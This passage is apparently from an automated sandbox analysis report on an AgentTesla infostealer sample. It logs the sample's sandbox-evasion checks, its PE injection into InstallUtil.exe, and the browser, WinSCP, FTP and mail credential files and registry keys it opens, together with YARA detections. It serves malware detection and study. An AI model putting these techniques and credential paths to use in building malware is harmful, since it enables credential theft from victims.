                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99782Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99669Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99387Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99278Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98955Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98719Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98281Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98062Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99672Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99344Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99231Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 99016Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 98891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 98762Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 98417Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 98312Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 98203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 98094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97969Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97859Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97750Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97640Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97531Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97422Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97312Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 97093Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96984Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96875Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96765Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96656Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96547Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96437Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96315Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96187Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 96078Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95940Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95816Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95687Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95562Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95344Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95234Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95125Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 95015Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94906Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94687Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94578Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94464Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94359Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94243Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 94140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99657
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99532
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99407
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99282
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99172
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99059
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98938
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98813
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98688
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98454
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98329
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98215
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98094
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: InstallUtil.exe, 00000005.00000002.2388262088.00000000008B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHA
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1931484082.000000000698C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: wscript.exe, 00000006.00000002.2038819271.0000023B6CDE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1917024832.0000000001466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yU]w
                        Source: ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                        Source: wscript.exe, 00000006.00000002.2038819271.0000023B6CDE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                        Source: ilsucsfth.exe, 00000007.00000002.2415794727.000000000562E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: vVMCI
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1917024832.0000000001466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\eS
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1917024832.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2922272930.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2386294998.0000000001111000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2943640737.0000000005D67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 540000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 540000Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 542000Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 57C000Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 57E000Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 209008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 972008Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess created: C:\Users\user\AppData\Local\Temp\ckuv.exe "C:\Users\user\AppData\Local\Temp\ckuv.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ilsucsfth.exe "C:\Users\user\AppData\Roaming\ilsucsfth.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeQueries volume information: C:\Users\user\Desktop\rCHARTERREQUEST.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ckuv.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeQueries volume information: C:\Users\user\AppData\Roaming\ilsucsfth.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.419edc0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.419edc0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.InstallUtil.exe.540000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2925812207.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.000000000262C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.0000000002632000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2925812207.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2925812207.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rCHARTERREQUEST.exe PID: 7388, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7904, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ilsucsfth.exe PID: 8128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6756, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.419edc0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.419edc0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.InstallUtil.exe.540000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2925812207.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rCHARTERREQUEST.exe PID: 7388, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7904, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ilsucsfth.exe PID: 8128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6756, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.419edc0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.419edc0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.InstallUtil.exe.540000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2925812207.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.000000000262C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2390155026.0000000002632000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2925812207.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
